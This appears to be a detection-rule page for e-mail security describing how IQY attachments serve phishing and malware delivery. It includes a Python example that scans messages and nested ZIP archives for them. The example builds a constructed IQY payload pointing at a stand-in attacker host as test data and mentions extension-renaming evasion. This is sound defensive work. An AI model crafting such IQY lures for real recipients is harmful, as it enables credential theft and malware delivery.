
Attachment: Excel Web Query File (IQY)

Sublime Rules

Summary
This detection rule targets Excel Web Query files (IQY), which are used for credential phishing and malware delivery. An IQY file is a small text file whose body tells Excel to fetch a URL when the file is opened, so whatever the attacker-controlled server returns, a prompt for credentials or content that Excel will evaluate, reaches the user through a trusted application. The rule recursively explodes email attachments, including commonly used archive file types, and flags any IQY file found directly or nested inside an archive. Detection is based on file extension, covering both IQY attachments and IQY files housed within compressed archives. By identifying these files before delivery, the rule aims to prevent credential theft and reduce the risk of malware delivery. The detection is rated high severity because the format is a low-effort, user-interaction-only lure against a common business application.
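The recursive attachment scan the summary describes, written out as an added example in Python (this is illustrative code, not the Sublime rule or its query language). It walks an e-mail's attachments, descends into ZIP archives to a bounded depth, and flags IQY files by extension. It goes one step beyond the summary's extension-only logic by also checking the file body, since a genuine IQY starts with a `WEB` header line followed by a version line and the URL Excel will fetch; the sample message, file names and URL are constructed for the example.

```python
"""Added example (not the Sublime rule itself): recursively scan an e-mail's
attachments, descending into ZIP archives, for Excel Web Query (.iqy) files.
The sample message, file names and URL below are constructed for illustration."""
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Archive extensions treated as "commonly used archive types". Only ZIP is
# actually opened here (stdlib); other types are recognised by name only.
ARCHIVE_EXTS = {".zip", ".rar", ".7z", ".gz", ".tar"}
MAX_DEPTH = 3  # bound recursion so a nested-archive bomb cannot stall the scan
URL_RE = re.compile(rb"https?://[^\s]+", re.IGNORECASE)


def ext_of(name):
    name = (name or "").lower()
    return name[name.rfind("."):] if "." in name else ""


def is_iqy(name, data):
    """Flag on the .iqy extension, and also on content: an IQY file's first
    line is 'WEB', its second a version number, its third the URL to fetch."""
    if ext_of(name) == ".iqy":
        return True
    first = data.lstrip().splitlines()[:1]
    return bool(first) and first[0].strip() == b"WEB" and URL_RE.search(data) is not None


def scan_blob(name, data, depth=0, path=""):
    """Yield (path_inside_message, fetched_url_or_None) for every IQY found,
    recursing into ZIP archives up to MAX_DEPTH levels deep."""
    full = f"{path}/{name}" if path else name
    if is_iqy(name, data):
        m = URL_RE.search(data)
        yield full, (m.group(0).decode(errors="replace") if m else None)
        return
    looks_like_archive = ext_of(name) in ARCHIVE_EXTS or data.startswith(b"PK\x03\x04")
    if depth < MAX_DEPTH and looks_like_archive:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    if not info.is_dir():
                        yield from scan_blob(info.filename, zf.read(info), depth + 1, full)
        except zipfile.BadZipFile:
            return  # rar/7z/corrupt: not a ZIP, and not opened by this example


def scan_message(raw_bytes):
    """Parse a raw RFC 5322 message and return all IQY findings in it."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_bytes)
    findings = []
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True) or b""
        findings.extend(scan_blob(part.get_filename() or "unnamed", payload))
    return findings


# Constructed sample: a hypothetical IQY pointing at a hypothetical host.
IQY_BODY = b"WEB\r\n1\r\nhttp://attacker.example/login.iqy\r\n"


def build_zip(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n, d in entries.items():
            zf.writestr(n, d)
    return buf.getvalue()


def sample_message():
    """A constructed message: a benign PDF, an IQY buried two ZIP levels deep,
    and the same IQY renamed to .txt (caught only by the content check)."""
    inner = build_zip({"docs/invoice.iqy": IQY_BODY})
    outer = build_zip({"inner.zip": inner, "readme.txt": b"hello"})
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "recipient@example.com"
    msg["Subject"] = "Invoice"
    msg.set_content("See attached.")
    msg.add_attachment(b"%PDF-1.4 placeholder", maintype="application", subtype="pdf", filename="ok.pdf")
    msg.add_attachment(outer, maintype="application", subtype="zip", filename="invoice.zip")
    msg.add_attachment(IQY_BODY, maintype="application", subtype="octet-stream", filename="notes.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for path, url in scan_message(sample_message()):
        print(f"IQY found: {path} -> fetches {url}")
```

The URL recovered from each hit is what a responder wants first: it identifies the server the victim's Excel would contact, which can be blocked and hunted for in proxy logs. The content check also catches an IQY whose extension was changed to dodge an extension-only rule; note that Excel will not open such a file by double-click, so the renamed case is a weaker lure, but it still indicates evasion worth flagging.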
Categories
  • Endpoint
  • Web
  • Application
Data Sources
  • File
  • Network Traffic
  • Application Log
Created: 2022-03-17